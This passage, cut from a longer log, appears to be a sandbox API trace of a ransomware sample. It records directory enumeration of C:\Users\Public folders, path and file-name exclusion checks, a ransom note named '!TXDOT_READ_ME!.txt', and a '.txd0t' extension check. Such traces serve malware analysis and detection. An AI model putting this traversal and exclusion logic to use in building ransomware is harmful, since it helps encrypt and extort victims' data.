lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.949] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.949] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\local\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\boot\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\perflogs\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\programdata\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\drivers\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\wsus\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="crypt_detect") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="cryptolocker") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="ransomware") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\WINDOWS") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.950] StrStrIW (lpFirst="C:\\Users\\Public\\Documents", lpSrch="C:\\Program Files") returned 0x0 [0119.950] GetProcessHeap () returned 0xe30000 [0119.950] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xef3600 [0119.950] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Documents", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0119.950] StrNCatW (in: psz1="C:\\Users\\Public\\Documents", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Documents\\*") returned="C:\\Users\\Public\\Documents\\*" [0119.950] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.951] StrCmpW (psz1=".", psz2=".") returned 0 [0119.951] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb1fb672c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb1fb672c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.951] StrCmpW (psz1="..", psz2=".") returned 1 [0119.951] StrCmpW (psz1="..", psz2="..") returned 0 [0119.951] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.951] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.951] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.951] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0119.951] StrCmpW (psz1="My Music", psz2=".") returned 1 [0119.951] StrCmpW (psz1="My Music", psz2="..") returned 1 [0119.951] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0119.951] StrCmpW (psz1="My Pictures", psz2=".") returned 1 [0119.951] StrCmpW (psz1="My Pictures", psz2="..") returned 1 [0119.951] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0119.951] StrCmpW (psz1="My Videos", psz2=".") returned 1 [0119.951] StrCmpW (psz1="My Videos", psz2="..") returned 1 [0119.951] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0119.951] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.952] GetProcessHeap () returned 0xe30000 [0119.952] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.952] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0119.952] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0119.952] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0119.952] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.952] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.952] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0119.952] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0119.952] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.952] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0119.952] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="crypt_detect") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="cryptolocker") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="ransomware") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\WINDOWS") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.953] StrStrIW (lpFirst="C:\\Users\\Public\\Downloads", lpSrch="C:\\Program Files") returned 0x0 [0119.953] GetProcessHeap () returned 0xe30000 [0119.953] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xef3600 [0119.953] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Downloads", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0119.953] StrNCatW (in: psz1="C:\\Users\\Public\\Downloads", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Downloads\\*") returned="C:\\Users\\Public\\Downloads\\*" [0119.953] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.953] StrCmpW (psz1=".", psz2=".") returned 0 [0119.953] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466cad2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.953] StrCmpW (psz1="..", psz2=".") returned 1 [0119.953] StrCmpW (psz1="..", psz2="..") returned 0 [0119.953] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.954] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.954] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.954] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.954] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.954] GetProcessHeap () returned 0xe30000 [0119.954] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.954] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5afc45f0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0119.954] StrCmpW (psz1="Libraries", psz2=".") returned 1 [0119.954] StrCmpW (psz1="Libraries", psz2="..") returned 1 [0119.954] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.954] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.954] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Libraries", cchMax=1056 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system32\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\system\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\local\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\boot\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\perflogs\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\programdata\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\drivers\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\wsus\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="crypt_detect") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="cryptolocker") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="ransomware") returned 0x0 [0119.954] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\WINDOWS") returned 0x0 [0119.955] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.955] StrStrIW (lpFirst="C:\\Users\\Public\\Libraries", lpSrch="C:\\Program Files") returned 0x0 [0119.955] GetProcessHeap () returned 0xe30000 [0119.955] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xef3600 [0119.955] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0119.955] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\*") returned="C:\\Users\\Public\\Libraries\\*" [0119.955] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5afc45f0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0119.955] StrCmpW (psz1=".", psz2=".") returned 0 [0119.955] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x5afc45f0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.955] StrCmpW (psz1="..", psz2=".") returned 1 [0119.955] StrCmpW (psz1="..", psz2="..") returned 0 [0119.955] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af9e5fe, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5af9e5fe, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5afc45f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.955] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.955] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.955] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0119.955] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0119.955] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\Public\\Libraries\\!TXDOT_READ_ME!.txt" [0119.955] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.955] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.955] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.956] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.956] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.956] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.956] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.956] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.956] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5af9e5fe, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms.txd0t", cAlternateFileName="RECORD~1.TXD")) returned 1 [0119.956] StrCmpW (psz1="RecordedTV.library-ms.txd0t", psz2=".") returned 1 [0119.956] StrCmpW (psz1="RecordedTV.library-ms.txd0t", psz2="..") returned 1 [0119.956] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Public\\Libraries", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0119.956] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0119.956] StrNCatW (in: psz1="C:\\Users\\Public\\Libraries\\", psz2="RecordedTV.library-ms.txd0t", cchMax=1076 | out: psz1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t") returned="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t" [0119.956] PathFindExtensionW (pszPath="RecordedTV.library-ms.txd0t") returned=".txd0t" [0119.956] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.956] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5af9e5fe, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms.txd0t", cAlternateFileName="RECORD~1.TXD")) returned 0 [0119.956] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.956] GetProcessHeap () returned 0xe30000 [0119.956] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.956] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0119.956] StrCmpW (psz1="Music", psz2=".") returned 1 [0119.956] StrCmpW (psz1="Music", psz2="..") returned 1 [0119.956] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0119.956] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0119.956] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0119.956] StrStrIW (lpFirst="C:\\Users\\Public\\Music", 